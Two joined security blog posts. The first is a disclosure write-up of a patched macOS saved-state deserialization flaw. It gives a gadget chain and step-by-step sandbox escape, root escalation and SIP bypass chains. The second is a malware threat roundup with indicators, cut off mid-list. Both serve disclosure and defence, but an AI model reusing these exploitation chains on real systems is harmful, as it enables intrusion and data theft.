
# Process injection: breaking all macOS security layers with a single vulnerability

12 August 2022 at 00:00

If you have created a new macOS app with Xcode 13.2, you may have noticed this new method in the template:

```objc
- (BOOL)applicationSupportsSecureRestorableState:(NSApplication *)app {
    return YES;
}
```


This was added to the Xcode template to address a process injection vulnerability we reported!

In macOS 12.0.1 Monterey, Apple fixed CVE-2021-30873. This was a process injection vulnerability affecting (essentially) all macOS AppKit-based applications. We reported this vulnerability to Apple, along with methods to use it to escape the sandbox, elevate privileges to root and bypass the filesystem restrictions of System Integrity Protection (SIP). In this post, we will first describe what process injection is, then the details of this vulnerability and finally how we abused it.

# Process injection

Process injection is the ability for one process to execute code in a different process. In Windows, one reason this is used is to evade detection by antivirus scanners, for example by a technique known as DLL hijacking. This allows malicious code to pretend to be part of a different executable. In macOS, this technique can have significantly more impact than that due to the difference in permissions two applications can have.

In the classic Unix security model, each process runs as a specific user. Each file has an owner, group and flags that determine which users are allowed to read, write or execute that file. Two processes running as the same user have the same permissions: it is assumed there is no security boundary between them. Users are security boundaries, processes are not. If two processes are running as the same user, then one process could attach to the other as a debugger, allowing it to read or write the memory and registers of that other process. The root user is an exception, as it has access to all files and processes. Thus, root can always access all data on the computer, whether on disk or in RAM.

This was, in essence, the same security model as macOS until the introduction of SIP, also known as “rootless”. This name doesn’t mean that there is no root user anymore, but that root on its own is now less powerful. For example, certain files can no longer be read by the root user unless the process also has specific entitlements. Entitlements are metadata included when generating the code signature of an executable. Checking whether a process has a certain entitlement is an essential part of many security measures in macOS. The Unix ownership rules are still present; entitlements are an additional layer of permission checks on top of them. Access to certain sensitive files (e.g. the Mail.app database) and features (e.g. the webcam) is no longer possible with root privileges alone but requires an additional entitlement. In other words, privilege escalation is not enough to fully compromise the sensitive data on a Mac.

For example, using the following command we can see the entitlements of Mail.app:

```
$ codesign -dvvv --entitlements - /System/Applications/Mail.app
```

In the output, we see the following entitlement:

```
...
[Key] com.apple.rootless.storage.Mail
[Value]
    [Bool] true
...
```

This is what grants Mail.app the permission to read the SIP-protected mail database, while other malware will not be able to read it.

Aside from entitlements, there are also the permissions handled by Transparency, Consent, and Control (TCC). This is the mechanism by which applications can request access to, for example, the webcam, microphone and (in recent macOS versions) also files such as those in the Documents and Downloads folders. This means that even applications that do not use the Mac Application sandbox might not have access to certain features or files.

Of course, entitlements and TCC permissions would be useless if any process could just attach as a debugger to another process of the same user. If one application has access to the webcam but another doesn’t, then the second could attach as a debugger to the first and inject code to steal the webcam video. To fix this, the ability to debug other applications has been heavily restricted.

Changing a security model that has been used for decades to a more restrictive model is difficult, especially in something as complicated as macOS. Attaching debuggers is just one example; there are many similar techniques that could be used to inject code into a different process. Apple has squashed many of these techniques, but many others are likely still undiscovered. Aside from Apple’s own code, these vulnerabilities could also occur in third-party software. It’s quite common to find a process injection vulnerability in a specific application, which means that the permissions (TCC permissions and entitlements) of that application are up for grabs for all other processes. Getting those fixed is a difficult process, because many third-party developers are not familiar with this security model. Reporting these vulnerabilities often requires fully explaining it! Electron applications in particular are infamous for being easy to inject into, as it is possible to replace their JavaScript files without invalidating the code signature.

More dangerous than a process injection vulnerability in one application is a process injection technique that affects multiple, or even all, applications. This would give access to a large number of different entitlements and TCC permissions. A generic process injection vulnerability affecting all applications is a very powerful tool, as we’ll demonstrate in this post.

# The saved state vulnerability

When shutting down a Mac, it will prompt you to ask if the currently open windows should be reopened the next time you log in. This is part of functionality called “saved state” or “persistent UI”. When reopening the windows, it can even restore new documents that were not yet saved in some applications.

It is used in more places than just at shutdown. For example, it is also used for a feature called App Nap. When an application has been inactive for a while (not the focused application, not playing audio, etc.), the system can tell it to save its state and then terminates the process. macOS keeps showing a static image of the application’s windows and in the Dock it still appears to be running, while it is not. When the user switches back to the application, it is quickly relaunched and resumes its state. Internally, this uses the same saved state functionality.

When building an application using AppKit, support for saving the state is largely automatic. In some cases the application needs to include its own objects in the saved state to ensure the full state can be recovered, for example in a document-based application.
Each time an application loses focus, it writes to the files:

```
~/Library/Saved Application State/<Bundle ID>.savedState/windows.plist
~/Library/Saved Application State/<Bundle ID>.savedState/data.data
```

The windows.plist file contains a list of all of the application’s open windows. (And some other things that don’t look like windows, such as the menu bar and the Dock menu.) For example, a windows.plist for TextEdit.app could look like this:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
	<dict>
		<key>MenuBar AvailableSpace</key>
		<real>1248</real>
		<key>NSDataKey</key>
		<data>
		Ay1IqBriwup4bKAanpWcEw==
		</data>
		<key>NSIsMainMenuBar</key>
		<true/>
		<key>NSWindowID</key>
		<integer>1</integer>
		<key>NSWindowNumber</key>
		<integer>5978</integer>
	</dict>
	<dict>
		<key>NSDataKey</key>
		<data>
		5lyzOSsKF24yEcwAKTBSVw==
		</data>
		<key>NSDragRegion</key>
		<data>
		AAAAgAIAAADAAQAABAAAAAMAAABHAgAAxgEAAAoAAAADAAAABwAAABUAAAAb
		AAAAKQAAAC8AAAA9AAAARwIAAMcBAAAMAAAAAwAAAAcAAAAVAAAAGwAAACkA
		AAAvAAAAPQAAAAkBAABLAQAARwIAANABAAAKAAAAFQAAABsAAAApAAAALwAA
		AD0AAAAJAQAASwEAAD4CAADWAQAABgAAAAwAAAAJAQAASwEAAD4CAADXAQAA
		BAAAAAwAAAA+AgAA2QEAAAIAAAD///9/
		</data>
		<key>NSTitle</key>
		<string>Untitled</string>
		<key>NSUIID</key>
		<string>_NS:34</string>
		<key>NSWindowCloseButtonFrame</key>
		<string>{{7, 454}, {14, 16}}</string>
		<key>NSWindowFrame</key>
		<string>177 501 586 476 0 0 1680 1025 </string>
		<key>NSWindowID</key>
		<integer>2</integer>
		<key>NSWindowLevel</key>
		<integer>0</integer>
		<key>NSWindowMiniaturizeButtonFrame</key>
		<string>{{27, 454}, {14, 16}}</string>
		<key>NSWindowNumber</key>
		<integer>5982</integer>
		<key>NSWindowWorkspaceID</key>
		<string></string>
		<key>NSWindowZoomButtonFrame</key>
		<string>{{47, 454}, {14, 16}}</string>
	</dict>
	<dict>
		<key>CFBundleVersion</key>
		<string>378</string>
		<key>NSDataKey</key>
		<data>
		P7BYxMryj6Gae9Q76wpqVw==
		</data>
		<key>NSDockMenu</key>
		<array>
			<dict>
				<key>command</key>
				<integer>1</integer>
				<key>mark</key>
				<integer>2</integer>
				<key>name</key>
				<string>Untitled</string>
				<key>system-icon</key>
				<integer>1735879022</integer>
				<key>tag</key>
				<integer>2</integer>
			</dict>
			<dict>
				<key>separator</key>
				<true/>
			</dict>
			<dict>
				<key>command</key>
				<integer>2</integer>
				<key>indent</key>
				<integer>0</integer>
				<key>name</key>
				<string>New Document</string>
				<key>tag</key>
				<integer>0</integer>
			</dict>
		</array>
		<key>NSExecutableInode</key>
		<integer>1152921500311961010</integer>
		<key>NSIsGlobal</key>
		<true/>
		<key>NSSystemAppearance</key>
		<data>
		YnBsaXN0MDDUAQIDBAUGBwpYJHZlcnNpb25ZJGFyY2hpdmVyVCR0b3BYJG9i
		amVjdHMSAAGGoF8QD05TS2V5ZWRBcmNoaXZlctEICVRyb290gAGkCwwRElUk
		bnVsbNINDg8QViRjbGFzc18QEE5TQXBwZWFyYW5jZU5hbWWAA4ACXxAUTlNB
		cHBlYXJhbmNlTmFtZUFxdWHSExQVFlokY2xhc3NuYW1lWCRjbGFzc2VzXE5T
		QXBwZWFyYW5jZaIVF1hOU09iamVjdAgRGiQpMjdJTFFTWF5jan1/gZidqLG+
		wQAAAAAAAAEBAAAAAAAAABgAAAAAAAAAAAAAAAAAAADK
		</data>
		<key>NSSystemVersion</key>
		<array>
			<integer>12</integer>
			<integer>2</integer>
			<integer>1</integer>
		</array>
		<key>NSWindowID</key>
		<integer>4294967295</integer>
		<key>NSWindowZOrder</key>
		<array>
			<integer>5982</integer>
		</array>
	</dict>
</array>
</plist>
```

The data.data file contains a custom binary format. It consists of a list of records; each record contains an AES-CBC encrypted serialized object.
The windows.plist file contains the key (NSDataKey) and an ID (NSWindowID) for the record from data.data it corresponds to.1 For example:

```
00000000  4e 53 43 52 31 30 30 30 00 00 00 01 00 00 01 b0  |NSCR1000........|
00000010  ec f2 26 b9 8b 06 c8 d0 41 5d 73 7a 0e cc 59 74  |..&.....A]sz..Yt|
00000020  89 ac 3d b3 b6 7a ab 1b bb f7 84 0c 05 57 4d 70  |..=..z.......WMp|
00000030  cb 55 7f ee 71 f8 8b bb d4 fd b0 c6 28 14 78 23  |.U..q.......(.x#|
00000040  ed 89 30 29 92 8c 80 bf 47 75 28 50 d7 1c 9a 8a  |..0)....Gu(P....|
00000050  94 b4 d1 c1 5d 9e 1a e0 46 62 f5 16 76 f5 6f df  |....]...Fb..v.o.|
00000060  43 a5 fa 7a dd d3 2f 25 43 04 ba e2 7c 59 f9 e8  |C..z../%C...|Y..|
00000070  a4 0e 11 5d 8e 86 16 f0 c5 1d ac fb 5c 71 fd 9d  |...]........\q..|
00000080  81 90 c8 e7 2d 53 75 43 6d eb b6 aa c7 15 8b 1a  |....-SuCm.......|
00000090  9c 58 8f 19 02 1a 73 99 ed 66 d1 91 8a 84 32 7f  |.X....s..f....2.|
000000a0  1f 5a 1e e8 ae b3 39 a8 cf 6b 96 ef d8 7b d1 46  |.Z....9..k...{.F|
000000b0  0c e2 97 d5 db d4 9d eb d6 13 05 7d e0 4a 89 a4  |...........}.J..|
000000c0  d0 aa 40 16 81 fc b9 a5 f5 88 2b 70 cd 1a 48 94  |..@.......+p..H.|
000000d0  47 3d 4f 92 76 3a ee 34 79 05 3f 5d 68 57 7d b0  |G=O.v:.4y.?]hW}.|
000000e0  54 6f 80 4e 5b 3d 53 2a 6d 35 a3 c9 6c 96 5f a5  |To.N[=S*m5..l._.|
000000f0  06 ec 4c d3 51 b9 15 b8 29 f0 25 48 2b 6a 74 9f  |..L.Q...).%H+jt.|
00000100  1a 5b 5e f1 14 db aa 8d 13 9c ef d6 f5 53 f1 49  |.[^..........S.I|
00000110  4d 78 5a 89 79 f8 bd 68 3f 51 a2 a4 04 ee d1 45  |MxZ.y..h?Q.....E|
00000120  65 ba c4 40 ad db e3 62 55 59 9a 29 46 2e 6c 07  |e..@...bUY.)F.l.|
00000130  34 68 e9 00 89 15 37 1c ff c8 a5 d8 7c 8d b2 f0  |4h....7.....|...|
00000140  4b c3 26 f9 91 f8 c4 2d 12 4a 09 ba 26 1d 00 13  |K.&....-.J..&...|
00000150  65 ac e7 66 80 c0 e2 55 ec 9a 8e 09 cb 39 26 d4  |e..f...U.....9&.|
00000160  c8 15 94 d8 2c 8b fa 79 5f 62 18 39 f0 a5 df 0b  |....,..y_b.9....|
00000170  3d a4 5c bc 30 d5 2b cc 08 88 c8 49 d6 ab c0 e1  |=.\.0.+....I....|
00000180  c1 e5 41 eb 3e 2b 17 80 c4 01 64 3d 79 be 82 aa  |..A.>+....d=y...|
00000190  3d 56 8d bb e5 7a ea 89 0f 4c dc 16 03 e9 2a d8  |=V...z...L....*.|
000001a0  c5 3e 25 ed c2 4b 65 da 8a d9 0d d9 23 92 fd 06  |.>%..Ke.....#...|
[...]
```

Whenever an application is launched, AppKit will read these files and restore the windows of the application. This happens automatically, without the app needing to implement anything. The code for reading these files is quite careful: if the application crashed, then maybe the state is corrupted too. If the application crashes while restoring the state, the state is discarded on the next launch and it does a fresh start.

The vulnerability we found is that the encrypted serialized object stored in the data.data file was not using “secure coding”. To explain what that means, we’ll first explain serialization vulnerabilities, in particular on macOS.

## Serialized objects

Many object-oriented programming languages have added support for binary serialization, which turns an object into a bytestring and back. Contrary to XML and JSON, these are custom, language-specific formats. In some programming languages, serialization support for classes is automatic; in other languages, classes can opt in.

In many of those languages these features have led to vulnerabilities. The problem in many implementations is that an object is created first, and only then is its type checked. Methods may be called on these objects when creating or destroying them. By combining objects in unusual ways, it is sometimes possible to gain remote code execution when a malicious object is deserialized. It is, therefore, not a good idea to use these serialization functions for any data that might be received over the network from an untrusted party.

For Python’s pickle and Ruby’s Marshal.load, remote code execution is straightforward. In Java (ObjectInputStream.readObject) and C#, RCE is possible if certain commonly used libraries are present.
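The “straightforward” Python case can be illustrated in a few lines: pickle lets any object specify, via `__reduce__`, a callable plus arguments that the deserializer will invoke, so unpickling untrusted data is equivalent to running attacker-chosen code. This is our own minimal, harmless sketch, not an example from the original research:

```python
import pickle

class Malicious:
    # __reduce__ tells pickle how to "reconstruct" this object.
    # We abuse it so the deserializer calls an arbitrary callable
    # (here the harmless str.upper) with our chosen arguments.
    def __reduce__(self):
        return (str.upper, ("pwned",))

payload = pickle.dumps(Malicious())

# The receiver thinks it is loading data, but loads() executes the
# attacker-chosen callable during deserialization.
result = pickle.loads(payload)
print(result)  # → PWNED (no Malicious instance is ever created)
```

A real payload would return something like `(os.system, ...)` instead of `str.upper`, which is why pickle must never be used on untrusted input.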
The ysoserial and ysoserial.net tools can be used to generate a payload depending on the libraries in use. In PHP, exploitability for RCE is rare.

### Objective-C serialization

In Objective-C, classes can implement the NSCoding protocol to be serializable. Subclasses of NSCoder, such as NSKeyedArchiver and NSKeyedUnarchiver, can be used to serialize and deserialize these objects. How this works in practice is as follows. A class that implements NSCoding must include the method:

```objc
- (id)initWithCoder:(NSCoder *)coder;
```

In this method, the object can use coder to decode its instance variables, using methods such as -decodeObjectForKey:, -decodeIntegerForKey:, -decodeDoubleForKey:, etc. When it uses -decodeObjectForKey:, the coder will recursively call -initWithCoder: on that object, eventually decoding the entire graph of objects.

Apple also realized the risk of deserializing untrusted input, so in OS X 10.8 the NSSecureCoding protocol was added. The documentation for this protocol states:

> A protocol that enables encoding and decoding in a manner that is robust against object substitution attacks.

This means that instead of creating an object first and then checking its type, a set of allowed classes needs to be specified when decoding an object. So instead of the unsafe construction:

```objc
id obj = [decoder decodeObjectForKey:@"myKey"];
if (![obj isKindOfClass:[MyClass class]]) { /* ...fail... */ }
```

The following must be used:

```objc
id obj = [decoder decodeObjectOfClass:[MyClass class] forKey:@"myKey"];
```

This means that when a secure coder is created, -decodeObjectForKey: is no longer allowed; -decodeObjectOfClass:forKey: must be used instead. That makes exploitable vulnerabilities significantly harder to find, but they can still happen. One thing to note here is that subclasses of the specified class are allowed. If, for example, the NSObject class is specified, then all classes implementing NSCoding are still allowed.
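To make the allow-list approach concrete, here is a hedged sketch of a class adopting NSSecureCoding (the `Person` class and its `name` property are our own illustration, not code from the original research):

```objc
@interface Person : NSObject <NSSecureCoding>
@property (readwrite, copy) NSString *name;
@end

@implementation Person

// Opting in: a secure coder will refuse plain -decodeObjectForKey:
// for this class and require an explicit set of allowed classes.
+ (BOOL)supportsSecureCoding {
    return YES;
}

- (void)encodeWithCoder:(NSCoder *)coder {
    [coder encodeObject:self.name forKey:@"name"];
}

- (instancetype)initWithCoder:(NSCoder *)coder {
    if ((self = [super init])) {
        // Only NSString (or one of its subclasses) may be decoded here;
        // any other class in the archive causes decoding to fail.
        _name = [[coder decodeObjectOfClass:[NSString class]
                                     forKey:@"name"] copy];
    }
    return self;
}

@end
```

Note that, as described above, an archive could still substitute any subclass of NSString here, since subclasses of the allowed class are accepted.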
If only an NSDictionary is expected and an imported framework contains a rarely used and vulnerable subclass of NSDictionary, then this could also create a vulnerability.

In all of Apple’s operating systems, these serialized objects are used all over the place, often for inter-process exchange of data. For example, NSXPCConnection heavily relies on secure serialization for implementing remote method calls. In iMessage, these serialized objects are even exchanged with other users over the network. In such cases it is very important that secure coding is always enabled.

## Creating a malicious serialized object

In the data.data file for saved states, objects were stored using an NSKeyedArchiver without secure coding enabled. This means we could include objects of any class that implements the NSCoding protocol. The likely reason for this is that applications can extend the saved state with their own objects, and because the saved state functionality is older than NSSecureCoding, Apple couldn’t just upgrade it to secure coding, as this could break third-party applications.

To exploit this, we wanted a method for constructing a chain of objects that would allow us to execute arbitrary code. However, no project similar to ysoserial for Objective-C appears to exist, and we could not find other examples of abusing insecure deserialization in macOS. In Remote iPhone Exploitation Part 1: Poking Memory via iMessage and CVE-2019-8641, Samuel Groß of Google Project Zero describes an attack against a secure coder by abusing a vulnerability in NSSharedKeyDictionary, an uncommon subclass of NSDictionary. As this vulnerability is now fixed, we couldn’t use it.

By decompiling a large number of -initWithCoder: methods in AppKit, we eventually found a combination of two objects that we could use to call arbitrary Objective-C methods on another deserialized object. We start with NSRuleEditor.
The -initWithCoder: method of this class creates a binding to an object from the same archive, with a key path also obtained from the archive.

Bindings are a reactive programming technique in Cocoa. They make it possible to bind a model directly to a view, without the boilerplate code of a controller. Whenever a value in the model changes, or the user makes a change in the view, the change is automatically propagated. A binding is created by calling the method:

```objc
- (void)bind:(NSBindingName)binding
    toObject:(id)observable
 withKeyPath:(NSString *)keyPath
     options:(NSDictionary<NSBindingOption, id> *)options;
```

This binds the property binding of the receiver to the keyPath of observable. A keypath is a string that can be used, for example, to access nested properties of the object. But the more common way to create bindings is as part of a XIB file in Xcode. For example, suppose the model is a class Person, which has a property @property (readwrite, copy) NSString *name;. Then you could bind the “value” of a text field to the “name” keypath of a Person to create a field that shows (and can edit) the person’s name.

The different options for what a keypath can mean are actually quite complicated. For example, when binding with a keypath of “foo”, it would first check if one of the methods getFoo, foo, isFoo and _foo exists. This would usually be used to access a property of the object, but this is not required. When a binding is created, the method is called immediately to provide an initial value. It does not matter if that method actually returns void. This means that by creating a binding during deserialization, we can use this to call zero-argument methods on other deserialized objects!

```
ID NSRuleEditor::initWithCoder:(ID param_1,SEL param_2,ID unarchiver)
{
  ...
  id arrayOwner = [unarchiver decodeObjectForKey:@"NSRuleEditorBoundArrayOwner"];
  ...
  if (arrayOwner) {
    keyPath = [unarchiver decodeObjectForKey:@"NSRuleEditorBoundArrayKeyPath"];
    [self bind:@"rows" toObject:arrayOwner withKeyPath:keyPath options:nil];
  }
  ...
}
```

In this case we use it to call -draw on the next object.

The next object we use is an NSCustomImageRep object. This obtains a selector (a method name) as a string and an object from the archive. When the -draw method is called, it invokes the method from the selector on the object, passing itself as the first argument:

```
ID NSCustomImageRep::initWithCoder:(ID param_1,SEL param_2,ID unarchiver)
{
  ...
  id drawObject = [unarchiver decodeObjectForKey:@"NSDrawObject"];
  self.drawObject = drawObject;
  id drawMethod = [unarchiver decodeObjectForKey:@"NSDrawMethod"];
  SEL selector = NSSelectorFromString(drawMethod);
  self.drawMethod = selector;
  ...
}
...
void ___24-[NSCustomImageRep_draw]_block_invoke(long param_1)
{
  ...
  [self.drawObject performSelector:self.drawMethod withObject:self];
  ...
}
```

By deserializing these two classes we can now call zero-argument methods and methods with multiple arguments, although the first argument will be an NSCustomImageRep object and the remaining arguments will be whatever happens to still be in those registers. Nevertheless, this is a very powerful primitive. We’ll cover the rest of the chain we used in a future blog post.

# Exploitation

## Sandbox escape

First of all, we escaped the Mac Application sandbox with this vulnerability. To explain that, some more background on the saved state is necessary.

In a sandboxed application, many files that would be stored in ~/Library are stored in a separate container instead.
So instead of saving its state in:

```
~/Library/Saved Application State/<Bundle ID>.savedState/
```

Sandboxed applications save their state to:

```
~/Library/Containers/<Bundle ID>/Data/Library/Saved Application State/<Bundle ID>.savedState/
```

Apparently, when the system is shut down while an application is still running (when the prompt is shown asking the user whether to reopen the windows the next time), the first location is symlinked to the second by talagent. We are unsure why; it might have something to do with upgrading an application to a new version which is sandboxed.

Secondly, most applications do not have access to all files. Sandboxed applications are very restricted, of course, but with the addition of TCC, even accessing the Downloads, Documents, etc. folders requires user approval. If an application opens an open or save panel, it would be quite inconvenient if the user could only see the files that that application has access to. To solve this, a different process is launched when opening such a panel: com.apple.appkit.xpc.openAndSavePanelService. Even though the window itself is part of the application, its contents are drawn by openAndSavePanelService. This is an XPC service which has full access to all files. When the user selects a file in the panel, the application gains temporary access to that file. This way, users can still browse their entire disk even in applications that do not have permission to list those files. As it is an XPC service with service type Application, it is launched separately for each app.

What we noticed is that this XPC service reads its saved state, but using the bundle ID of the app that launched it! As this panel might be part of the saved state of multiple applications, it does make some sense that it would need to separate its state per application.
As it turns out, it reads its saved state from the location outside of the container, but with the application’s bundle ID:

```
~/Library/Saved Application State/<Bundle ID>.savedState/
```

But as we mentioned, if the app was ever open when the user shut down their computer, this will be a symlink to the container path. Thus, we can escape the sandbox in the following way:

1. Wait for the user to shut down while the app is open, if the symlink does not yet exist.
2. Write malicious data.data and windows.plist files inside the app’s own container.
3. Open an NSOpenPanel or NSSavePanel. The com.apple.appkit.xpc.openAndSavePanelService process will now deserialize the malicious object, giving us code execution in a non-sandboxed process.

This was fixed earlier than the other issues, as CVE-2021-30659 in macOS 11.3. Apple addressed it by no longer loading the state from the same location in com.apple.appkit.xpc.openAndSavePanelService.

## Privilege escalation

By injecting our code into an application with a specific entitlement, we can elevate our privileges to root. For this, we could apply the technique explained by A2nkF in Unauthd - Logic bugs FTW.

Some applications have an entitlement of com.apple.private.AuthorizationServices containing the value system.install.apple-software. This means that the application is allowed to install packages that have a signature generated by Apple without authorization from the user. For example, “Install Command Line Developer Tools.app” and “Bootcamp Assistant.app” have this entitlement.

A2nkF also found a package signed by Apple that contains a vulnerability: macOSPublicBetaAccessUtility.pkg. When this package is installed to a specific disk, it will run (as root) a post-install script from that disk. The script assumes it is being installed to a disk containing macOS, but this is not checked. Therefore, by creating a malicious script at the same location, it is possible to execute code as root by installing this package.
The exploitation steps are as follows:

1. Create a RAM disk and copy a malicious script to the path that will be executed by macOSPublicBetaAccessUtility.pkg.
2. Inject our code into an application with the com.apple.private.AuthorizationServices entitlement containing system.install.apple-software by creating the windows.plist and data.data files for that application and then launching it.
3. Use the injected code to install the macOSPublicBetaAccessUtility.pkg package to the RAM disk.
4. Wait for the post-install script to run.

In the writeup from A2nkF, the post-install script ran without the filesystem restrictions of SIP. It inherited this from the installation process, which needs it because package installation might have to write to SIP-protected locations. This was fixed by Apple: post- and pre-install scripts are no longer SIP exempt. The package and its privilege escalation can still be used, however, as Apple still uses the same vulnerable installer package.

## SIP filesystem bypass

Now that we had escaped the sandbox and elevated our privileges to root, we wanted to bypass SIP as well. To do this, we looked at all available applications to find one with a suitable entitlement. Eventually, we found something on the macOS Big Sur Beta installation disk image: “macOS Update Assistant.app” has the com.apple.rootless.install.heritable entitlement. This means that this process can write to all SIP-protected locations (and the entitlement is heritable, which is convenient because we can just spawn a shell). Although it is supposed to be used only during the beta installation, we can simply copy it to a normal macOS environment and run it there. The exploitation is quite simple:

1. Create malicious windows.plist and data.data files for “macOS Update Assistant.app”.
2. Launch “macOS Update Assistant.app”.

When exempt from SIP’s filesystem restrictions, we can read all files in protected locations, such as the user’s Mail.app mailbox.
We can also modify the TCC database, which means we can grant ourselves permission to access the webcam, microphone, etc. We could also persist our malware in locations protected by SIP, making it very difficult to remove by anyone other than Apple. Finally, we can change the database of approved kernel extensions. This means that we could load a new kernel extension silently, without user approval. Combined with a vulnerable kernel extension (or a code-signing certificate that allows signing kernel extensions), we would have been able to gain kernel code execution, which would allow disabling all other restrictions too.

# Demo

We recorded the following video to demonstrate the different steps. It first shows that the application “Sandbox” is sandboxed, then it escapes its sandbox and launches “Privesc”. This elevates privileges to root and launches “SIP Bypass”. Finally, this opens a reverse shell that is exempt from SIP’s filesystem restrictions, which is demonstrated by writing a file in /var/db/SystemPolicyConfiguration (the location where the database of approved kernel modules is stored).

# The fix

Apple first fixed the sandbox escape in macOS 11.3, by no longer reading the saved state of the application in com.apple.appkit.xpc.openAndSavePanelService (CVE-2021-30659). Fixing the rest of the vulnerability was more complicated. Third-party applications may store their own objects in the saved state, and these objects might not support secure coding. This brings us back to the method from the introduction: -applicationSupportsSecureRestorableState:. Applications can now opt in to requiring secure coding for their saved state by returning YES from this method. Unless an app opts in, it will keep allowing non-secure coding, which means process injection might remain possible.

This does highlight one issue with the current design of these security measures: downgrade attacks.
The code signature (and therefore the entitlements) of an application will remain valid for a long time, and the TCC permissions of an application will still work if the application is downgraded. A non-sandboxed application could silently download an older, vulnerable version of an application and exploit that. For the SIP bypass this would not work, as “macOS Update Assistant.app” does not run on macOS Monterey because certain private frameworks no longer contain the necessary symbols. But that is a coincidental fix; in many other cases older applications may still run fine. This vulnerability will therefore be present for as long as there is backwards compatibility with older macOS applications!

Nevertheless, if you write an Objective-C application, please make sure you implement -applicationSupportsSecureRestorableState: to return YES and adopt secure coding for all classes used in your saved state!

# Conclusion

In the current security architecture of macOS, process injection is a powerful technique. A generic process injection vulnerability can be used to escape the sandbox, elevate privileges to root and bypass SIP’s filesystem restrictions. We have demonstrated how we used insecure deserialization in the loading of an application’s saved state to inject into any Cocoa process. This was addressed by Apple in the macOS Monterey update.

1. It is unclear what security the AES encryption here is meant to add, as the key is stored right next to it. There is no MAC, so no integrity check for the ciphertext. ↩︎

# Threat Roundup for August 5 to August 12

12 August 2022 at 20:12

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Aug. 5 and Aug. 12. As with previous roundups, this post isn't meant to be an in-depth analysis.
Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found herethat includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files. The most prevalent threats highlighted in this roundup are: Threat Name Type Description Win.Dropper.Tofsee-9960568-0 Dropper Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages to infect additional systems and increase the size of the botnet under the operator's control. 
- **Win.Dropper.TrickBot-9960840-0** (Dropper): Trickbot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts.
- **Win.Trojan.Zusy-9960880-0** (Trojan): Zusy, also known as TinyBanker or Tinba, is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe." When the user accesses a banking website, it displays a form to trick the user into submitting personal information.
- **Win.Dropper.DarkComet-9961766-1** (Dropper): DarkComet and related variants are a family of remote access trojans designed to provide an attacker with control over an infected system. This malware can download files from a user's machine, has mechanisms for persistence and hiding, and has the ability to send back usernames and passwords from the infected system.
- **Win.Ransomware.TeslaCrypt-9960924-0** (Ransomware): TeslaCrypt is a well-known ransomware family that encrypts a user's files with strong encryption and demands Bitcoin in exchange for a file decryption service. A flaw in the encryption algorithm was discovered that allowed files to be decrypted without paying the ransom, and eventually, the malware developers released the master key, allowing all encrypted files to be recovered easily.
- **Win.Virus.Xpiro-9960895-1** (Virus): Expiro is a known file infector and information stealer that hinders analysis with anti-debugging and anti-analysis tricks.
- **Win.Dropper.Emotet-9961142-0** (Dropper): Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails.
- **Win.Dropper.Remcos-9961392-0** (Dropper): Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, and capture screenshots. This malware is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
- **Win.Dropper.Ramnit-9961396-0** (Dropper): Ramnit is a banking trojan that monitors web browser activity on an infected machine and collects login information from financial websites. It also has the ability to steal browser cookies and attempts to hide from popular antivirus software.

## Threat Breakdown

### Win.Dropper.Tofsee-9960568-0

#### Indicators of Compromise

• IOCs collected from dynamic analysis of 10 samples

Registry Keys Occurrences <HKU>\.DEFAULT\CONTROL PANEL\BUSES Value Name: Config4  3 <HKU>\.DEFAULT\CONTROL PANEL\BUSES  3 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: LanguageList  3 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\dhcpqec.dll,-100  3 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\dhcpqec.dll,-101  3 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\dhcpqec.dll,-103  3 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\dhcpqec.dll,-102  3 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\napipsec.dll,-1  3 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\napipsec.dll,-2  3 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\napipsec.dll,-4  3 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\napipsec.dll,-3  3 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\tsgqec.dll,-100  3 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\tsgqec.dll,-101  3 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: 
